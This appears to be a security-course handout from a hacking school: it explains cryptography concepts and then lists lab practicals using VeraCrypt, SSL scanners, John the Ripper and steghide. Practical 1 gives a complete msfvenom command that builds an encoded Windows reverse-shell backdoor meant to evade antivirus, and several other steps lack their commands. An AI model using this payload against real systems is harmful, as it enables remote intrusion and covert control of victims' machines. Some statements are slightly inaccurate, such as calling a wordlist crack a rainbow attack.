1|Page

www.hackerschool.in
Cryptography
Cryptography is a process of converting plain text data (readable) into
ciphertext (unreadable) data to protect confidentiality so that unauthorized users
cannot understand what is transmitted. Encryption algorithms are used to perform
mathematical computation on data using the key and convert data to ciphertext.
The algorithm that is chosen to perform encryption with some key can also be used
for decryption. Decryption is the process of converting ciphertext to plaintext.
Encryption is a reversible operation, i.e., converting plaintext to ciphertext and vice
versa is possible using the algorithm and key. Cryptography is used to protect the
confidentiality of information shared on the internet such as email messages, chat
sessions, web transactions, personal data, corporate data, e-commerce applications,
etc.

Objectives of Cryptography
Confidentiality: To ensure that private or confidential information is not made
available or disclosed to unauthorized individuals.

Integrity: To ensure that an unauthorized individual does not tamper the

information exchanged over the internet.

Availability: To ensure that services are not denied to authorized users.

Types of Cryptography
Based on the number of keys used for encryption they are classified into two types
● Symmetric key cryptography
● Asymmetric key cryptography

www.hackerschool.in
Symmetric Encryption
The symmetric key algorithm is also known as the secret key algorithm.
Symmetric key algorithms use the same cryptographic key for both encryption and
decryption. Data Encryption Standard (DES) and Advanced Encryption Standard
(AES) algorithms are the most commonly used symmetric key algorithm which
uses a key at sender side for encryption, and the receiver uses the same key for
decryption. To make two parties (sender and receiver) to communicate
confidentially, they must first exchange the secret key so that each party can
encrypt messages to send and decrypt messages to read. This process is known as
key exchange. This key is shared between two parties over a secure channel. Based
on input data these algorithms can be further divided into two categories

Block ciphers: Block ciphers encrypt data one block at a time.

Stream ciphers: Stream ciphers encrypt data byte by byte.

The strength of any cryptographic algorithm depends on the secrecy of the

key. If keys are not securely shared, then unauthorized parties can gain access to a
secret key used for encryption and they can un-encrypt data and read every packet
shared between two parties.

www.hackerschool.in
Asymmetric Encryption
Asymmetric key algorithms use two different keys known as a public key
and a private key for encryption and decryption. The sender and receiver generate a
private key which is kept secret (not shared with anyone) and a public key which is
shared with other parties. In case of asymmetric algorithms, senders encrypt
messages using the receiver's public key. The receiver's private key can only
decrypt this encrypted message. In this manner, it ensures that both the
confidentiality and integrity of information are preserved. The best part of
asymmetric encryption is its Key Management system; it takes advantage of Public
Key Infrastructure for proper management of public keys.

www.hackerschool.in
Cipher
In cryptography, a cipher is an algorithm that performs encryption or
decryption in a series of well-defined steps that can be followed as a procedure.
Ciphers are classified based on input data, a number of keys used for encryption.

Classical ciphers
Classical ciphers are cryptographic algorithms that have been used in the
past (practically computed and solved manually). Classical ciphers are often
divided into substitution ciphers and transposition ciphers.
Substitution cipher: In a substitution cipher, letters are systematically replaced
throughout the message for other letters. In these cipher method monoalphabetic
substitution ciphers, where just one cipher alphabet is used. Polyalphabetic
substitution cipher, where multiple cipher alphabets are used.
Transposition ciphers: In a transposition cipher, the letters themselves are kept
unchanged, but their order within the message is scrambled. Many transposition
ciphers are done according to geometric design.

Modern ciphers
Modern ciphers are designed based on various concepts of mathematics such
as number theory, computational complexity theory, and probability theory. It
needs the computational power to encrypt and decrypt the data. Modern encryption
methods are divided into two type based on input data (Block and Stream ciphers),
and a number of keys (secret key and public key) used.

www.hackerschool.in
Hash function
A hash function performs a series of mathematical operations to convert
input data into a fixed length alphanumeric characters. The input to the hash
function is an arbitrary length, but the output is always of fixed length.

Features of Hash Functions

● Fixed Length Output: Hash function converts data of arbitrary length to a
fixed length.
● The efficiency of Operation: Computationally hash functions are much
faster than asymmetric encryption.

Examples of the Hash functions

These are examples of well-known hash functions:
Hashed Message Authentication Code (HMAC): Combines authentication via a
shared secret with hashing.
Message Digest 2 (MD2): Byte-oriented, produces a 128-bit hash value from an
arbitrary-length message, designed for smart cards.
MD4: Similar to MD2, designed specifically for fast processing in software.
MD5: Similar to MD4 but slower because the data is manipulated more.
Secure Hash Algorithm (SHA): Modeled after MD4 and proposed by NIST for
the Secure Hash Standard (SHS), produces a 160-bit hash value.

Steganography
Steganography is an art of hiding a secret message within an ordinary
message and extracting it at the destination to maintain the confidentiality of data.
The program named ‘snow’ is used to conceal messages in ASCII text by
appending whitespace to the end of lines. There are different tools that can hide
text in pictures so that to retrieve the hidden secret message the receiver must use
the same tool as sender used to hide the text message. Steganalysis is the art of
discovering and rendering secret messages using steganography.

www.hackerschool.in
Cryptography Attacks
Cryptography attacks are based on the assumption that the cryptanalyst has
access to the encrypted information.
● Chosen plaintext
● Adaptive chosen plaintext attack
● Known plaintext
● Known ciphertext
● Chosen ciphertext
● Chosen key
● Rubber cosh cryptanalysis
Brute force attack is a process of defeating a cryptographic scheme by trying
a large number of possible keys until the correct encryption key is discovered.

References:
1. Stallings, W. (2017). Cryptography and network security: Principles and
practice. Boston: Pearson Prentice Hall.
2. Ninocrudele. (2018, April 03). Retrieved from
http://ninocrudele.com/azureleap-aes-encryption-and-hash-algorithm-
concepts-and-best-practices-in-cloud

www.hackerschool.in
 INDEX
S. No. Practical Name Page No.
1 Encrypting a backdoor with msfvenom encoding options 1

2 Creating an encrypted virtual disk using VeraCrypt 2

3 Identifying SSL details using SSLScan 11

4 Identifying misconfigurations on the web server 16

5 Identifying Hash algorithms for given hash value 17

6 Cracking encrypted passwords using John the ripper 18

7 Steghide 19

THIS DOCUMENT INCLUDES ADDITIONAL PRCTICALS WHICH MAY OR MAY NOT BE COVERED DURING
CLASSROOM TRAINING. FOR MORE DETAILS APPROACH LAB COORDINATORS
 Practical 1: Encrypting a backdoor with msfvenom encoding
options
Description: In this practical you will learn how to encode a backdoor using the
encoding modules available in the Metasploit framework, to make it not able to be
detected most of the time by antivirus software or antimalware software.

Step 1: In this practical, we use encoding options in msfvenom to create an encrypted

malicious file. Options
● -e: indicates the name of the encoder
● -i: is to mention a number of iterations.

Syntax: msfvenom -p <payload name> LHOST=<attacker IP> LPORT<attacker port

number> -f <format of the output> -o output name -e <encoder name> -i <number of
iterations>
● To view the list of encoders, execute the below command: msfvenom –list
encoder

Step 2: Execute following command to a backdoor named back.exe using

x86/shikata_ga_nai
Command: msfvenom –p windows/meterpreter/reverse_tcp LHOST=192.168.0.103
LPORT=1234 -f exe -o /var/www/html/back.exe -e x86/shikata_ga_nai -i 7
● Try to add different encoding options, to make malware undetectable.

1|Page
www.hackerschool.in
Practical 2: Creating an encrypted virtual disk using VeraCrypt.
Description: In this practical you will learn how to create an encrypted virtual disk that
doesn’t give any impression like it is a storage disk, even if anyone find, they need to
have password and if any other any encryption algorithms you used in the process of
encryption, to decrypt the disk and see the information stored in that. All these features
are provided by a free tool called VeraCrypt.

Part 1: VeraCrypt Volume Creation

Step 1: Download Windows version of VeraCrypt software from VeraCrypt . Double-
click the downloaded file to install VeraCrypt.

2|Page
www.hackerschool.in
Step 2: Launch VeraCrypt from Windows Start menu. To create an encrypted
VeraCrypt Volume, click on Create Volume as shown in below image.

Step 3: Select Create an encrypted file container on VeraCrypt volume creation

wizard.

3|Page
www.hackerschool.in
Step 4: Select type of volume to be created. In this case, we choose Standard
VeraCrypt volume.

Step 5: VeraCrypt creates an encrypted container, which is later used to store files.
VeraCrypt treats this newly created volume as a normal file on the hard disk. Specify the
volume location by selecting an existing file from the disk. In this case, we have
selected a PDF document.

4|Page
www.hackerschool.in
Note: The selected file will be replaced by the newly created volume (we will not be
able to access the file contents later). Read the information displayed on the wizard
carefully to know more about file selection.

Step 6: Choose an Encryption and Hash Algorithm for creating the new VeraCrypt
volume.

Step 7: Specify the size of VeraCrypt container.

5|Page
www.hackerschool.in
Step 8: Provide a password which is used to protect the VeraCrypt volume. (Read the
information displayed on the wizard).

Step 9: Move the mouse randomly within volume creation wizard until randomness
indicator turns green. This increases the cryptographic strength of keys used for
encryption. Once done, click on Format.

6|Page
www.hackerschool.in
Step 10: After creation of VeraCrypt volume click on Exit to close the volume wizard.

7|Page
www.hackerschool.in
Part 2: Storing files in an Encrypted VeraCrypt Volume
Step 1: Select a Drive letter, click on Select File to select previously provided pdf
document (used as a container) then click on Mount to mount the hidden VeraCrypt
container.

Step 2: Provide the password and click on OK to unlock the encrypted container.

8|Page
www.hackerschool.in
Step 3: After completing the above process, we can access the hidden disk as a normal
hard drive (K) as shown in the below image. We can store files in this drive (100 MB)
which will be encrypted and hidden for normal usage.

9|Page
www.hackerschool.in
Step 4: Click on Dismount to hide the VeraCrypt volume.

Note: It is important to preserve document used to create volume and VeraCrypt

software to access files stored in this VeraCrypt volume.

10 | P a g e
www.hackerschool.in
 Practical 3: Identifying SSL details using SSLScan.
Description: In this practical you will learn how to query SSL/TLS services, such as HTTPS,
in order to determine the ciphers that are supported, using SSLScan tool.

Step 1: Execute below commands to start SSLScan and retrieve details such as ciphers used an
SSL certificate.

11 | P a g e
www.hackerschool.in
 12 | P a g e
www.hackerschool.in
 13 | P a g e
www.hackerschool.in
 14 | P a g e
www.hackerschool.in
 15 | P a g e
www.hackerschool.in
 Practical 4: Identifying misconfigurations on the web server.
Description: In this practical you will learn how to analyze the SSL configuration of a server
by connecting to it and identify mis-configurations affecting their SSL servers, using the sslyze
tool.
Step 1: Execute below command to analyze web servers and identify misconfigurations.

16 | P a g e
www.hackerschool.in
 Practical 5: Identifying Hash algorithms for given hash value
Description: In this practical you will learn how to create hash value for information that may
be files or words and identify which hash algorithm is used to create the hash you have, using
the hash-identifier tool.
Execute hash-identifier command on terminal and provide hash value to identify the algorithm
used to generate the concerned hash.

17 | P a g e
www.hackerschool.in
 Practical 6: Cracking encrypted passwords using John the
ripper
Description: In this practical you will learn how to use John the ripper tool for cracking
different hashed passwords. This tool will generate hashes for the words in the wordlist that
you have given or by default it has, and compare those hashes with the hash value you have
provided to the tool. It can crack different hash formats.
Web applications store passwords in the form of hashes. To retrieve actual password (plain-
text) from the hash value, we can take the help of John the ripper. Executing the below
command with necessary options will perform a rainbow attack against wordlist to identify the
actual password.

18 | P a g e
www.hackerschool.in
 Practical 7: Steghide
Description: In this practical we will learn how to use steghide tool to hide small text
files inside the image, and make it password protected.

Part 1: Embedding text file in jpg image

Step 1: Here we have two files on Desktop location, one is image file and another one is
a text file. let us use these files to perform steganography.

Step 2: execute the following command in the terminal to see the different options
available in steghide tool.
● Command: steghide --help

19 | P a g e
www.hackerschool.in
Step 3: To hide the sample.txt file in rush.jpg execute the following command in the
terminal.
● Command: steghide --embed -ef sample.text -cf rush.jpg -sf stegimg.jpg
● Syntax: steghide --embed -ef <location of text file> -cf <location of image file> -
sf <location of output file>
o --embed: used for hiding one file in another
o -ef: path of file which we want to hide
o -cf: path of file in which we want to hide
o -sf: path of file where we want to save the output

Step 4: After executing the above command it will ask for setting up a password. Enter
you password

Step 5: After setting password it will create the output image file that has a text file
embedded in it.

20 | P a g e
www.hackerschool.in
Part 2: Extracting text file from jpg image
Step 1: Execute the following command to extract the embedded text file from the
stegimg.jpg
● Command: steghide –extract -sf stegimg.jpg
● Syntax: steghide –extract -sf <location of steganographic file>
o --extract: to extract file from the steganographic file
o -sf: path of steganographic file

Step 2: Now it will ask for the password, enter the password that we set during the
creation of stegfile.

Step 3: After entering the correct password, it will extract the text file from the stegfile
image.

21 | P a g e
www.hackerschool.in